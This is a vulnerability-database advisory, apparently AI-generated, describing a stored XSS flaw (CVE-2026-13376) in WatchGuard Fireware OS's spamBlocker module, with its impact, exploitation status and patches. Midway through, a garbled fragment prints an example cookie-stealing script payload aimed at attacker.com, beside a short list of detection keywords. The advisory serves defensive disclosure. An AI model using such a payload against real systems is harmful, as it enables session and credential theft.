
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-13376 is a Stored Cross-Site Scripting (XSS) vulnerability in the spamBlocker module of WatchGuard Fireware OS, classified under CWE-79. It is described as an additional unmitigated attack path for the previously disclosed CVE-2025-1071. Affected versions include Fireware OS 12.0 through 12.12, 12.5 through 12.5.18, and 2025.1 through 2026.2. The vulnerability was published on July 3, 2026, and carries a CVSS v3.1 base score of 4.8 (Medium) (WatchGuard Advisory, GitHub Advisory).
The root cause is improper neutralization of user-controllable input in the spamBlocker module's web page generation logic (CWE-79), allowing malicious scripts to be persistently stored and later rendered in victims' browsers. Exploitation requires an attacker to hold high-privilege credentials on the Fireware OS management interface and to inject a crafted payload into the spamBlocker module; a separate user must then view the affected page (passive user interaction required). The vulnerability is network-accessible with low attack complexity, and it represents an additional, previously unpatched attack path related to CVE-2025-1071 (WatchGuard Advisory, GitHub Advisory). No public proof-of-concept code has been identified at this time.
Successful exploitation allows an authenticated attacker to inject malicious scripts into the spamBlocker module that are persistently stored and executed in the browsers of any user who subsequently views the affected administrative pages. This can result in session token theft, credential harvesting, and unauthorized actions performed on behalf of legitimate users within the Fireware OS management interface. The impact is limited to low confidentiality and low integrity effects on subsequent systems, with no direct availability impact (WatchGuard Advisory, GitHub Advisory).
As of the time of publication, there is no evidence of active in-the-wild exploitation or publicly available proof-of-concept exploit code for CVE-2026-13376. CISA's SSVC assessment indicates exploitation is currently "none" and the vulnerability is not automatable. The EPSS score is approximately 0.158%, placing it in the 5th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory, WatchGuard Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a user-controlled input field within the spamBlocker module that is not properly sanitized before storage.<script>, onerror=, javascript:).WatchGuard has released patched versions addressing this vulnerability: upgrade to Fireware OS 12.12.1 or later (for the 12.x branch), a version beyond 12.5.18 for the 12.5 branch, or 2026.2.1 or later for the 2025.1+ branch. As interim mitigations, administrators should restrict access to the spamBlocker module's administrative interface to trusted users only, implement Content Security Policy (CSP) headers where possible, and monitor spamBlocker logs for suspicious script injection attempts. If the spamBlocker module is not actively required, consider disabling it until patching is complete (WatchGuard Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."